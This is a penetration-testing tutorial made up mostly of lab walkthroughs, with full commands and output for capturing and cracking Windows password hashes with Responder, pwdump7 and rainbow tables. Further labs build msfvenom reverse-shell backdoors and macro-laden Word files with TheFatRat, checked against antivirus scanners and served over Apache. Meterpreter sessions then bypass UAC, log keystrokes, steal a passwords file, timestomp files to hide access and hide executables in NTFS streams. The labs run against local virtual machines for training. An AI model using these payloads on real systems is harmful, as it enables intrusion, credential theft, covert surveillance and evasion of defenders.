🌐【Introduction To Network PenTesting】🖧 🌐【Footprinting & Reconnaissance Guides】🖧 🌐【Network Scanning Guides】🖧 🌐【Network Enumerations Guides】🖧 🌐【Network PenTesting Modules & Tools】🖧 🌐【Malwares & Trojan Defense Guides】🖧 🌐【Network Sniffing Guides & Tools】🖧 🌐【Social Engineering Guides & Tools】🖧 🌐【Denial of Services Guides & Tools】🖧 🌐【Session Hijacking Guides & Tools】🖧

🌐Network PenTesting Modules & Tools🖧

Vulnerability Scanning refers to auditing hosts, ports, and services running in a network to assess the security posture and search for security loopholes.

It determines the possibility of network security attacks, evaluating the organization’s systems and network for vulnerabilities such as missings patches, unnecessary services, weak authentication, and weak encryption. Vulnerability scanning is a critical component of any penetration testing assignment.

Nessus

Nessus Scanner
Nessus Scanner

Nessus allows to remotely audit a network and determine if it has been broken into or misued in some way. It also provides the ability to locally audit a specific machine for vulnerabilities.

Official website: https://www.tenable.com/downloads/nessus

GFI LanGuard

GFI LanGuard
GFI LanGuard

GFI LanGuard is a software similar to Nessus, it scans networks and ports to detect, assess, and correct any security vulnerabilities found.

Official website: https://www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard

Nikto

Nikto
Nikto

Nikto Web Scanner is a Web server scanner that tests Web servers for dangerous file/CGIs, outdated server software and other problems.

Nikto is an Open Source (GPL) web server which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers. It also scans server configuration items such as the presence of multiple index files, HTTP server options, and attempts to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated. Nikto is not a stealth tool, it scans a webserver in the shortest time but gets logged in an IDS.

Official repository: https://github.com/sullo/nikto

System Hacking

System hacking is the science of testing computers and network for vulnerabilities and harmful plug-ins. System hacking is itself a vast subject which consists of hacking the different software based technological systems such as laptops, desktops, etc. System hacking is defined as the compromise of computer systems and software to gain access to the target computer and steal or misuse their sensitive information. Here the malicious hacker exploits the weaknesses in a computer system or network to gain unauthorized access of its data or take illegal advantage of it.

LLMNR/NBT-NS

Link-Local Multicast Name Resolution (LLMNR) and Netbios Name Service (NBT-NS) are two components of Microsoft Windows machines. LLMNR was introduced in Windows Vista and is the successor to NBT-NS.

When a DNS name server request fails, Link-Local Multicast Name Resolution(LLMNR) and Net-BIOS Name Service(NBT-NS) is used by Windows machines as a fallback. If the DNS name still remains unresolved, the windows performs an unauthenticated UDP broadcast to the whole network. Any masquerading machine, claiming to be the server then sends a response and capture the target's credentials during the authentication process.

LLMNR/NBT-NS Spoofing attack is a classical internal network attack that still works, due to low awareness and the fact it's enabled by default in Windows.

LLMNR spoofing

LLMNR and NBT-NS are enabled by default in Windows and can be used to extract the passwords hashes from a user. There is a good chance of acquiring the user credentials on a internal network.

By listening for LLMNR/NBT-NS broadcast requests, it is possible for an attacker to spoof itself as the server and send a response claiming to be the legitimate server. After the victim system accepts the connection, it is possible to gain the victim's user-credentials by using a tool like Responder.py.

Objectives

  • Perform LLMNR/NBT-NS spoofing attack.

Requesites

  • Windows 10 virtual machine.
  • Kali Linux virtual machine.

Using Responder

responder banner

  1. Launch and login to Windows 10 machine. (Make sure to select a common password that 'non-tech' people will use - i.e qwerty).
  2. Go to Kali Linux and open the Terminal window.
  3. Start Responder to listen the network interface. (You can type responder -h to see the options available).

responder -I eth0

  1. Now go back to the Windows 10 machine and let's assume that you want to access a shared network drive connected in your network. Launch run and type:

\\ceh-tools

run

Obtaining and Cracking the Hashes

On the Kali Machine, Responder starts capturing the access logs of Windows 10 machine as shown below:

responder response

  1. Go to /usr/share/responder/logs/ and open the last file created by responder:

SMB-NTLMv2-SSP-10.0.2.39.txt

responder log

These are hashes of the logged in user collected by responder. Now let's crack these hashes.

To crack the passwords we will use JohnTheRipper.

  1. Open a new Terminal window and type john and the path to the responder logs + the name of your log file (note the file name may differ from your lab environment):

john /usr/share/responder/logs/SMB-NTLMv2-SSP-10.0.2.39.txt

Using default input encoding: UTF-8

Loaded 4 password hashes with 4 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])

Will run 2 OpenMP threads

Proceeding with single, rules:Single

Press 'q' or Ctrl-C to abort, almost any other key for status

Almost done: Processing the remaining buffered candidate passwords, if any.

Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.

Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist

qwerty           (Dummy)

qwerty           (Dummy)

qwerty           (Dummy)

qwerty           (Dummy)

4g 0:00:00:00 DONE 2/3 (2019-12-11 13:51) 26.66g/s 357713p/s 378293c/s 378293C/s 123456..random

Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably

Session completed

The cracked passwords hashes of the Dummy user has shown in the output above.

Dumping and Cracking SAM hashes to Extract Plaintext passwords

Pwdump7 can be used to dump protected files. Ophcrack is a free open source (GPL) program that cracks Windows passwords by using LM hashes through rainbow tables.

SAM (Security Account Manager) is a database file present in Windows machines that stores user accounts and security descriptors for users on a local computer. It stores users passwords in a hashed format (in LM hash and NTLM hash). Because a hash function is one-way, this provides some measure of security for the storage of the passwords.

You need to have administrator access to dump the contents of the SAM file. Assessment of password strength is a critical milestone during your security assessment engagement. You will start your password assessment with a simple SAM hash dump and running it with a hash decryptor to uncover plaintext passwords.

Objectives

  • Use the pwdump7 tool to extract password hashes.
  • Use the Ophcrack tool to crack the passwords and obtain plain text passwords.

Requisites

  • Windows 10 machine.

Tools

  1. Ophcrack
  2. Pwdump7

Generate Hashes

  1. Before anything, we need to find the User IDs associated with the usernames for Windows 10.
  2. Launch the Command prompt in Administrator mode and type:

wmic useraccount get name,sid > c:/users.txt

This command we got the usernames and their respective UserIDs. Make a note of each UserID for further steps.

  1. To gather the Password hashes, go to the pwdump7 folder and execute the .exe file.

cd C:\Users\Dummy\Desktop\pwdump7

PwDump7.exe

To gather this information on external .txt file, type:

PwDump7.exe > c:\hashes.txt

Now place the usernames before the respective UserIDs that we have gathered in step 2 and save the file.

Using Ophcrack to crack the hashes

  1. Launch the Ophcrack application.
  2. Click on Load and select PWDUMP file

Ophcrack

  1. Next, you will need to download tables to perform the cracking. Select the Vista free to download.
  2. Go to the Ophcrack and click the Tables menu to load the Table.
  3. On the Table Selection window, select the Vista free, and click Ok.

This table_vista_free is a pre-computed table for reversing cryptographic hash functions and recovering plaintext passwords up to a certain length. The selected table_vista_free is installed under the name Vista free, which is represented by a green colored bullet.

  1. Click Crack on the menu bar. Ophcrack begins to crack passwords. This action will take a few minutes.

Rainbow Tables

RainbowCrack is a computer program that generates rainbow tables for use in password cracking.

RainbowCrack Documentation

Overview of Rainbow Tables

A rainbow table is a pre-computed table for reversing cryptographic hash functions, typically used for cracking password hashes. Tables are usually used in recovering the plaintext password consisting of a limited set of characters, up to a certain length.

Objectives

  • Short introduction to rainbow tables and use them to crack the hashes and obtain plain text passwords.

Generate Rainbow Table

To obtain rainbow tables you can download or manually generate using rtgen that comes with rainbowcrack package.

Install RainbowCrack CLI version:

sudo apt-get install rainbowcrack

GUI version: https://project-rainbowcrack.com/

Usage example: rtgen hash_algorithm charset plaintext_len_min plaintext_len_max table_index chain_len chain_num part_index

Hash Algorithm

Description

hash_algorithm

Rainbow table is hash algorithm specific. Rainbow table for a certain hash algorithm only helps to crack hashes of that type. The rtgen program natively support lots of hash algorithms like lm, ntlm, md5, sha1, mysqlsha1, halflmchall, ntlmchall, oracle-SYSTEM and md5-half. In the example above, we generate md5 rainbow tables that speed up cracking of md5 hashes.

charset

The charset includes all possible characters for the plaintext. "loweralpha-numeric" stands for "abcdefghijklmnopqrstuvwxyz0123456789", which is defined in configuration file charset.txt.

plaintext_len_min plaintext_len_max

These two parameters limit the plaintext length range of the rainbow table. In the example above, the plaintext length range is 1 to 7. So plaintexts like "a" and "abcdefg" are likely contained in the rainbow table generated. But plaintext "abcdefgh" with length 8 will not be contained.

table_index1

The table_index parameter selects the reduction function. Rainbow table with different table_index parameter uses different reduction function.

chain_len1

This is the rainbow chain length. Longer rainbow chain stores more plaintexts and requires longer time to generate.

chain_num1

Number of rainbow chains to generate. Rainbow table is simply an array of rainbow chains. Size of each rainbow chain is 16 bytes.

part_index

To store a large rainbow table in many smaller files, use different number in this parameter for each part and keep all other parameters identical.

Example:

rtgen md5 loweralpha-numeric 1 7 0 3800 33554432 0

CPU will be busy computing rainbow chains. On system with multi-core processor, all cores are fully utilized.

To pause table generation, just press Ctrl+C and rtgen program will exit. Next time if the rtgen program is executed with exactly same parameters, table generation is resumed.

This command takes hours to complete with ordinary processor.

After generating the rainbow table you need to sort it. Rainbowcrack comes with rtsort program, that sorts the rainbow chains by end point to make binary search possible so the processor can access them quicker.

rtsort *.rt

Cracking

To display the usage and options just type rcrack.

usage: ./rcrack path [path] [...] -h hash

       ./rcrack path [path] [...] -l hash_list_file

       ./rcrack path [path] [...] -lm pwdump_file

       ./rcrack path [path] [...] -ntlm pwdump_file

path: directory where rainbow tables (*.rt, *.rtc) are stored

-h hash:           load single hash

-l hash_list_file: load hashes from a file, each hash in a line

-lm pwdump_file:   load lm hashes from pwdump file

-ntlm pwdump_file: load ntlm hashes from pwdump file

 

implemented hash algorithms:

    lm HashLen=8 PlaintextLen=0-7

    ntlm HashLen=16 PlaintextLen=0-15

    md5 HashLen=16 PlaintextLen=0-15

    sha1 HashLen=20 PlaintextLen=0-20

    sha256 HashLen=32 PlaintextLen=0-20

 

examples:

    ./rcrack . -h 5d41402abc4b2a76b9719d911017c592

    ./rcrack . -l hash.txt

L0phtCrack

L0phtCrack is a password auditing tool that contains features such as scheduling, hash extraction from 64-bit Windows versions, multiprocessor algorithms, and network monitoring and decoding. It can import and crack UNIX password files from remote Windows machines.

Free Trial: https://www.l0phtcrack.com/
Documentation: https://www.l0phtcrack.com/doc/

Useful links:

https://project-rainbowcrack.com/documentation.htm

https://www.insecurity.be/blog/2018/01/21/retrieving-ntlm-hashes-and-what-changed-technical-writeup/

https://asecuritysite.com/encryption/lmhash

 

Exploiting Client Side Vulnerabilities and Establishing a VNC session

Attackers use client-side vulnerabilities to exploit unpatched software, thereby attaining access to the machine on which the software is installed.

VNC enables attackers to remotely access and control computers targeted from another computer or mobile device, wherever they are in the world. At the same time, it is also used by administrator and organizations throughout every industry sector for a range of different scenarios and use cases, including providing IT desktop support to colleagues and friends, and accessing systems and services on the move.

Objectives

  • How to exploit client-side vulnerabilities and establish a VNC session.

Requisites

  • Kali Linux virtual machine (Attacker).
  • Windows 10 virtual machine (Target).

Launch Metasploit Framework

Launch Kali Linux and open the Terminal window and type:

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=10.0.2.42 LPORT=444 -o /root/Desktop/Test.exe

Note: LHOST is the IP address of your Kali machine.

This command will generate Test.exe, a malicious file on Desktop as shown in below:

No encoder or badchars specified, outputting raw payload

Payload size: 341 bytes

Final size of exe file: 73802 bytes

Saved as: /root/Desktop/Test.exe

You can also try this by using the msfconsole.

To check the malicious file that you created, go to https://nodistribute.com/ or https://antiscan.me and upload the file:

AntiScan.Me

This site will perform a scan over 20 AV softwares databases. Do not upload your backdoors or any file to virusTotal.

Share the malicious file on target

Now create a directory to share this file with the target machine provide the permissions and copy the file from Desktop to shared location:

Create a directory on html folder:
mkdir /var/www/html/share/

Change the mode for the share to 755:
chmod -R 755 /var/www/html/share/

Change the ownership of that folder to www-data:
chown -R www-data:www-data /var/www/html/share/

Now copy the malicious file to the shared location:
cp /root/Desktop/Test.exe /var/www/html/share/

Next, start the apache service:
service apache2 start

Open a new terminal window and type msfconsole to launch Metasploit Framework.

Use the multi/handler to capture the session.

msfconsole

In msfconsole:

  1. use multi/handler
  2. set payload windows/meterpreter/reverse_tcp
  3. set the LHOST to your Kali IP address and LPORT to 444
  4. run the exploit

Reverse TCP

A reverse shell (also known as a connect-back) is the exact opposite: it requires the attacker to set up a listener first on his box, the target machine acts as a client connecting to that listener, and then finally the attacker receives the shell.

This guide exploits memory corruption vulnerability within Microsoft's HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused.

On Windows machine

Remember to deactivate all Windows Defender parameters.

Launch the browser and type the IP address of the Kali machine that are running apache webserver and download the Test.exe.

In my case is http://10.0.2.42/share

Test.Exe

Double click Test.exe.
You will get a Security Warning window, click run.

Sec Warning

Meterpreter

Switch to Kali Linux machine and check if there is any session that are opened in the Meterpreter Shell as shown below:

meterpreter

Meterpreter is a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code.

Useful commands: https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/

About Meterpreter: https://doubleoctopus.com/security-wiki/threats-and-tools/meterpreter/

Remote View in Kali Linux

Now, you can create a VNC session on Windows 10 machine remotely by typing:

run vnc

This command will open a VNC session of the Target's machine as shown below:

vnc

Useful links:

  1. Metasploit Cheat Sheet - SANS
  2. Meterpreter Cheat Sheet
  3. Msfvenom Cheat Sheet

 

Escalating Privileges

Privilege Escalation is the demonstration of misusing a bug, configuration imperfection, or design oversight in a working framework or programming application to increase lifted access to assets that are regularly shielded from an application or client.

Once attackers gain access to the target system, they start looking for different ways to escalate their privilege in the system. They can exploit vulnerability, design flaw or configuration oversight in the OS or software applications on the target system to gain elevated access to resources that are normally protected from an application or user. The privilege escalation can be vertical or lateral.

Objectives

  • Demonstrate how to escalate privileges on a victim machine by exploiting its vulnerabilities.

Requisites

  • Kali Linux virtual machine.
  • Windows 10 virtual machine.

Create a Backdoor

To create the malicious executable file, type this command and put your Kali IP address on LHOST option:

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.0.2.42 -f exe > Desktop/Exploit.exe

This command will create the Windows executable file named Exploit.exe and will be saved on the Kali desktop.

exploit.exe

Share the Exploit.exe file

First of, we need to setup the apache configuration and the shared folder.

Apache configuration

If you didn't have apache2 installed, run apt-get install apache2.

Navigate to the apache2 folder, open the apache2.conf configuration file, and add a new line:
vim /etc/apache2/apache2.conf

Add a new line with the command: servername localhost and save the file.

apache.conf

Create a new directory inside html folder:
mkdir /var/www/html/share/

Change the mode for the share to 755:
chmod -R 755 /var/www/html/share/

Change the ownership of that folder to www-data:
chown -R www-data:www-data /var/www/html/share/

To see the configuration of sharing options type:
ls -la /var/www/html/ | grep share

drwxr-xr-x 2 www-data www-data  4096 Dec 18 20:52 share

Now copy the malicious file to the shared location:
cp /root/Desktop/Test.exe /var/www/html/share/

Start the apache service to run the http server:
service apache2 start

Perform Exploitation

Start the Metasploit Framework by typing:

msfconsole

Select the multi/handler and set the payload to meterpreter/reverse_tcp:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp

Set the LHOST to the Kali IP address:

set LHOST 10.0.2.42

Start the exploit on background:

exploit -j -z

[*] Exploit running as background job 0.

[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.0.2.42:4444

Run the Exploit

Switch to the Windows 10 machine, launch the browser and type the URL:

http://10.0.2.42/share/ (Change to the IP address of your your Kali).

share-exploit

Click Exploit.exe to download the backdoor file. Once the file is downloaded navigate to the download location and open the file to execute.

If an Open File - Security Warning window appears, click Run.

Sec Warning

Switch back to the Kali machine. Meterpreter session has been successfully opened, as shown below:

[*] Sending stage (180291 bytes) to 10.0.2.15

[*] Meterpreter session 1 opened (10.0.2.42:4444 -> 10.0.2.15:49804) at 2019-12-18 21:04:09 -0500

To interact with the available sessions, you can use the command sessions or sessions -i to list the current sessions opened. To open any session, select the ID by issuing the command:

sessions <ID>

sessions

Establish a Session

[+] Meterpreter Cheat Sheet

Open the current Meterpreter session and type:

getuid

meterpreter > getuid

Server username: DESKTOP-ICB2IQ4\dummy

You will notice that the Meterpreter server is running with the normal user privileges. You will not be able to execute command (such as hashdump, which dumps the user account hashes located in the SAM file; clearev, which clears the event logs remotely; and so on.) that requires administrative/root privileges.

Let's check this out by executing this command:

run post/windows/gather/smart_hashdump

meterpreter > run post/windows/gather/smart_hashdump

 

[*] Running guide against DESKTOP-ICB2IQ4

[*] Hashes will be saved to the database if one is connected.

[+] Hashes will be saved in loot in JtR password file format to:

[*] /root/.msf4/loot/20191218220106_default_10.0.2.15_windows.hashes_986306.txt

[-] Insufficient privileges to dump hashes!

[-] Insufficient privileges to dump hashes!

The command fails to dump the hashes from the SAM file located in Windows 10 and returns an error stating that Insufficient Privileges to dump hashes.

From this, it is evident that Meterpreter server requires admin privileges to perform such actions.

Now, we can try to escalate the privileges by issuing a getsystem command that attempts to elevate the user privileges.

getsystem -t 1

which uses the Service - Named Pipe Impersonation (In Memory/Admin) Technique.

meterpreter > getsystem -t 1

[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:

[-] Named Pipe Impersonation (In Memory/Admin)

The command fails to escalate privileges and returns an error (Access is Denied).

From the above result, it is evident that the security configuration of the Windows 10 machine is blocking you from gaining unrestricted access to it.

Perform Privilege Escalation

We can try to bypass the user account control setting that is blocking you from gaining unrestricted access to machine.

Move the current Meterpreter session to the background. Just type background.

Use the bypassuac_fodhelper exploit for Windows:
use exploit/windows/local/bypassuac_fodhelper

Type options to see the configurations, and you will observer theres only session setting, type sessions to see the ID of the previous meterpreter session and set to the current exploit:

set SESSION <ID>

Type run to exploit:

run-bypassuac_fodhelper

The BypassUAC exploit has successfully bypassed the UAC setting on the Windows 10 machine and another Meterpreter session has opened.

Now, the first thing is check the current User ID status of Meterpreter by issuing getuid command. You will observe that Meterpreter server is still running with normal user privileges.

getuid

meterpreter > getuid

Server username: DESKTOP-ICB2IQ4\dummy

At this stage, we shall re-issue the getsystem command with the -t 1 switch, in an attempt to elevate the privileges.

getsystem -i 1

meterpreter > getsystem -i 1

 

...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

This time, the command has successfully escalated user privileges and returns a message stating got system, as shown above.

Now, type getuid again.

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

The meterpreter session is now running with SYSTEM privileges (NT AUTHORITY\SYSTEM).

Let's try to obtain the hashes located in the SAM file of Windows 10 by typing:

run post/windows/gather/smart_hashdump

getSystem

This time, the meterpreter successfully extracted the NTLM hashes and displayed them as shown in above. Thus, we have successfully escalated privileges by exploiting the Windows 10 machine's vulnerabilities.

You can now execute commands like (clearev, which clears the event logs remotely, etc)

 

Hacking Windows with Malicious Office Document using TheFatRat

TheFatRat is an exploiting tool which compiles a malware with famous payload, and then the compiled malware can be executed on Linux, Windows, Mac and Android. TheFatRat Provides An Easy way to create Backdoors and Payload which can bypass most anti-virus.

Official Repository: https://github.com/Screetsec/TheFatRat

Objectives

  • How to use an office document to exploit a windows machine.

Requisites

  • Windows Server 2016/2012 virtual machine.
  • Kali linux virtual machine.

Set up TheFatRat

TheFatRat provides an easy way to create backdoors and payloads which can bypass most anti-virus systems.

Setting up

  1.                 Go to your Kali machine and open the Terminal.
  2.                 Navigate to the /opt/ folder.
    cd /opt
  3.                 Clone the original github repository from FatRat:
    git clone https://github.com/Screetsec/TheFatRat.git
  4.                 Change the folder permissions:
    chmod -R 755 /opt/TheFatRat/
  5.                 Go to the TheFatRat folder:
    cd TheFatRat/
  6.                 Execute the bash file (setup.sh) to begin the installation:
    ./setup.sh

An Updating Kali Repo xterm window will popup as shown below:

installing-fatRat

Make a Backdoor File

After the installation is complete, in the Terminal, type fatrat and hit enter.

When FatRat launches, starts to verify the installed dependencies, you will get multiple prompts, just type Enter to continue.

fatratmenu

On the FatRat menu, choose [06] Create Fud Backdoor 1000% with PwnWindws [Excelent] by typing 6.

PwnWind

PwnWinds menu appears as shown above, choose the [3] Create exe file with apache + Powershell (FUD 100%) by typing 3 in the menu.

payload

Set the LHOST IP to your Kali IP; LPORT to 4444 and the output to payload as show above.

Next, chose [3] windows/meterpreter/reverse_tcp by typing 3.

payloadchoose

If everything works, fatrat will generate a payload.exe file located on /root/Fatrat_Generated/ as shown below:

Backdoor Saved To : /root/Fatrat_Generated/payload.exe

Make a Malicious Word File

Go back to the main menu by choosing [9] Back to menu.

On the main menu, choose the [07] Create Backdoor For Office with Microsploit

microsploit

On the Microsploit menu, choose [2] The Microsoft Office Macro on Windows by typing 2.

The next configurations will be:

  1. LHOST IP: [Your Kali IP]
  2. LPORT: 4444
  3. Enter the base name for output files: EvilDoc
  4.                 Enter the message for the document body: you have been PWNED :)
  5.                 The next prompt will ask if you want to use a custom exe to file backdoor. Choose y for yes.
  6.                 Specify the exactly path to your payload.exe that you generated on the beginings of this lab: /root/Fatrat_Generated/payload.exe
  7.                 On the Payload Option, choose the [3] windows/meterpreter/reverse_tcp by typing 3. Navigate to output folder of FatRat to you will see the generated Word file.

evilFiles

Set Up a Listener

Open another Terminal window and launch metasploit by typing: msfconsole.

Select the multi/handler:
use multi/handler

Set the payload to meterpreter/reverse_tcp:
set payload windows/meterpreter/reverse_tcp

Set the LHOST to your Kali IP and LPORT to 4444:
set LHOST 10.0.2.42
set LPORT 4444

Type run to start the listener:
run

Share the Malicious Doc File

To share the malicious file to Windows machine, copy the Doc file to the apache folder. Open a new Terminal window and type:
cp /root/Fatrat_Generated/EvilDoc.docm /var/www/html/share/

Then, start the apache service:
service apache2 start

Open the Malicious doc

Switch to your Windows machine and open the browser.

Type the URL (based on your Kali IP):
http://10.0.2.42/share/

Then, download the malicious doc that you generated.

EvilFile-0

Open the downloads folder and click the MS Word file.

MS Word open the file in Protected View. Click Enable Editing as shown below:

ms-word-protected-view

If you got the SECURITY WARNING because of the Macros, click on Enable Content.

Now Switch back to the Kali, if everything works, you will find that have a Meterpreter session open in the Metasploit terminal.

meterpreter-docfile

Now you can view the exploited system details and so on. Informally you can call this action 'profit' :)

Hacking Windows using Metasploit / Meterpreter - Post-Exploitation

Metasploit Framework is a tool for developing and executing exploit code against a remote target machine.

Backdoors

Backdoors are malicious files that contain Trojan or other infectious applications that can either halt the current system of a target machine or even gain partial/complete control over it. Attackers build such backdoors in attempt to gain remote access to victim machines. They send these backdoors through email, file-sharing web applications, shared networks drivers, among others, and entice the users to execute them. Once a user executes such application, and attacker can gain access to his/her affected machine and perform activities such as keylogging, sensitive data extraction, and so on.

Objectives

  • Learn to detect Trojan and Backdoor attacks.
  • Creating a server and testing the network for attack.
  • Attacking a network using a sample backdoor and monitor system activity.

Requisites

  • Kali Linux virtual machine
  • Windows 10 virtual machine (Target)

Before beginning this lab, create a file called passwords.txt on Windows 10 and write down some fake accounts like:

  1.                 paypal: bobby123 / qwerty123
  2.                 twitter: bobby_123 / password123
  3.                 (...)

Save the file on your Desktop or Downloads folder.

Note: Make sure to disable Windows SmartScreen and Windows Defender.

Prepare the Backdoor

1. Create the Backdoor.exe

Switch to the Kali Linux and open the Terminal window.

Type the command to create the payload:

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.0.2.42 -f exe > /root/Desktop/Backdoor.exe

Make sure to put your Kali IP on LHOST. If works, you will get this message below:

Found 1 compatible encoders

Attempting to encode payload with 1 iterations of x86/shikata_ga_nai

x86/shikata_ga_nai succeeded with size 368 (iteration=0)

x86/shikata_ga_nai chosen with final size 368

Payload size: 368 bytes

Final size of exe file: 73802 bytes

2. Share the Backdoor.exe

Start the Apache services:
service apache2 start

If you didn't have apache2 installed, type: apt-get install apache2

Copy the Backdoor.exe to the /www/html/share/ folder which will be visible from the web:
cp /root/Desktop/Backdoor.exe /var/www/html/share/

3. Set up the Handler

Open a new Terminal window and start the Metasploit Framework:
msfconsole

To handle exploits launched outside the framework, select the exploit/multi/handler:
use exploit/multi/handler

Set the reverse TCP payload:
set payload windows/meterpreter/reverse_tcp

To view the payload configurations:
options

Name      Current Setting  Required  Description

----      ---------------  --------  -----------

EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)

LHOST                      yes       The listen address (an interface may be specified)

LPORT     4444             yes       The listen port

Set the LHOST to your Kali IP:
set LHOST 10.0.2.42

The LPORT is correct, as shown above (4444).

To start the handler on the background, type:
expoit -j -z

Download and Execute the Backdoor.exe

Switch to your Windows 10 virtual machine and launch the browser.

Type the URL (based on your Kali IP):
http://10.0.2.42/share/

Then, download the backdoor.exe

backdoor-file

Double-click on the application and accept the Warnings.

Now Switch back to the Kali.

meterpreter-backdoor

If everything works, you will find that have a Meterpreter session open in the Metasploit terminal.

Using Meterpreter

To display the target system information, such as computer name, OS and so on, type:

sysinfo

meterpreter > sysinfo

Computer        : DESKTOP-ICB2IQ4

OS : Windows 10 (10.0 Build 16299).

Architecture    : x64

System Language : en_US

Domain          : WORKGROUP

Logged On Users : 2

Meterpreter     : x86/windows

To view IP address, MAC address and so on, type:

ipconfig

meterpreter > ipconfig

 

Interface  1

============

Name         : Software Loopback Interface 1

Hardware MAC : 00:00:00:00:00:00

MTU          : 4294967295

IPv4 Address : 127.0.0.1

IPv4 Netmask : 255.0.0.0

IPv6 Address : ::1

IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

 

 

Interface  3

============

Name         : Intel(R) PRO/1000 MT Desktop Adapter

Hardware MAC : 08:00:27:f8:e8:ec

MTU          : 1500

IPv4 Address : 10.0.2.15

IPv4 Netmask : 255.255.255.0

IPv6 Address : fe80::b8c2:616d:b6a1:1f4e

IPv6 Netmask : ffff:ffff:ffff:ffff::

To get the user that the server is running as, type:

getuid

meterpreter > getuid

Server username: DESKTOP-ICB2IQ4\dummy

Go to the folder that contains the passwords.txt that you created before, using cd(change directory), ls(list), pwd(working directory) commands.

meterpreter > cd Desktop

meterpreter > ls

Listing: C:\Users\dummy\Desktop

===============================

 

Mode Size     Type  Last modified Name

---- ----     ----  ------------- ----

100777/rwxrwxrwx  6646896  fil   2018-12-19 16:48:13 -0500  ProxySwitcher.exe

100777/rwxrwxrwx  73802    fil   2018-12-18 15:45:13 -0500  T3st.exe

100666/rw-rw-rw-  282      fil   2018-12-13 14:38:05 -0500  desktop.ini

100666/rw-rw-rw-  173      fil   2018-12-20 12:28:02 -0500  passwords.txt.txt

After you find the file, use the cat command to read the contents of the text file:

meterpreter > cat passwords.txt.txt

amex: bobby12 / qwerty123

paypal: bobby_123 / password123

twitter: b0bby1337 / password123

reddit: b0bby1337 / password123

google: bobby_31337@gmail.com / password1337

The MACE Attributes (Modified-Accessed-Created-Entry)

While performing post exploitation activities, a hacker tries to access files to read their contents. Upon doing so, the MACE attributes change immediately, which gives and indication to the file user/owner that someone has read or modified the information.

To leave no hint of these MACE attributes, use the timestomp command to change the attributes as you wish after accessing a file.

TO view the mace attributes of passwords.txt, type:

timestomp passwords.txt -v

This command displays the created time, accessed time, modified time, and entry modified time, as shown below:

meterpreter > timestomp passwords.txt.txt -v

[*] Showing MACE attributes for passwords.txt.txt

Modified      : 2018-12-20 12:29:25 -0500

Accessed      : 2018-12-20 12:28:02 -0500

Created       : 2018-12-20 12:28:02 -0500

Entry Modified: 2018-12-20 12:29:25 -0500

Download a File

download <filename>

meterpreter > download passwords.txt.txt

[*] Downloading: passwords.txt.txt -> passwords.txt.txt

[*] Downloaded 173.00 B of 173.00 B (100.0%): passwords.txt.txt -> passwords.txt.txt

[*] download   : passwords.txt.txt -> passwords.txt.txt

The downloaded file is stored in the Home folder by default.

Locating files with Search

The search command helps you locate files on the target machine. The command is capable of search through the whole system or specific folder.

search -f pagefile.sys

meterpreter > search -f pagefile.sys

Found 1 result...

    c:\pagefile.sys (1476395008 bytes)

Log all the Key strokes

To start capturing all keyboard input from the target system, type:

keyscan_start

meterpreter > keyscan_start

Starting the keystroke sniffer ...

Switch to the Windows 10, create a text file and type something:

quick-brown-fox

Switch back to the Kali Linux and dump the captured Keystrokes, by typing:

keyscan_dump

meterpreter > keyscan_dump

Dumping captured keystrokes...

<Shift><Shift><Shift><Shift>Fox.txt<CR>

<Shift>The quick brown fox jumps over the lazy hacker.<^S>

View the idle time

You can see the number of seconds for which the user has been idle on the remote system, by typing:

idletime

meterpreter > idletime

User has been idle for: 4 mins 31 secs

You may shut down the target machine after performing post exploitation, by typing:

shutdown

meterpreter > shutdown

Shutting down...

meterpreter >

[*] 10.0.2.15 - Meterpreter session 1 closed.  Reason: Died

Useful links:

  1.                 Metasploit Cheat Sheet - SANS
  2.                 Meterpreter Cheat Sheet
  3.                 Meterpreter Cheat Sheet 2
  4.                 Meterpreter Big guide
  5.                 Msfvenom Cheat Sheet

Hiding Files using NTFS streams

A stream consists of data associated with a main file directory (known as the main unnamed stream). Each file and directory in NTFS can have multiple data streams that are generally hidden from the user.

https://docs.microsoft.com/en-us/sysinternals/downloads/streams

NTFS supersedes the FAT file system as the preferred file system for Microsoft Windows operating systems. NTFS has several improvements over FAT and HPFS (High Performance File System), such as improved support for metadata and the use of advanced data structures.

Objectives

  • How to hide files usign NTFS streams.

Requirements

  • Windows 7, 8, 10 or Windows Server 2012, 2016.

Hiding Data using NTFS streams

Make sure the C:\drive file system is NTFS format. To check this, go to Computer and right click C:\ and click Properties.

NFTS-Info-1

  1. Open Windows Explorer and create a new folder called trick inside the C: drive.
  2. Go to C:\windows\system32 and copy the calc.exe to the trick folder.

Calc-copy

  1. Launch the command prompt as Administrator, and navigate to C:\trick.
    cd C:\trick
  2. Create a readme.txt file, type Hello World inside of it and save the file.
    notepad readme.txt
  3. Back to command prompt and type dir to list the files on the current folder. Note the file size of readme.txt.

Readme-Size

  1. Now hide calc.exe inside the readme.txt by typing:
    type c:\trick\calc.exe > c:\trick\readme.txt:calc.exe

ntfs-4

  1. Type dir again and note the file size of readme.txt did not change.
  2. Back to the c:\trick and delete the calc.exe.

Execute the Hidden Application

  1. Create a symlink: mklink backdoor.exe readme.txt:calc.exe
  2. Execute the backdoor.exe by typing: backdoor.exe

ntfs-5

Attackers may hide malicious files from being visible to the legitimate users by using NTFS streams and execute them whenever required.

 

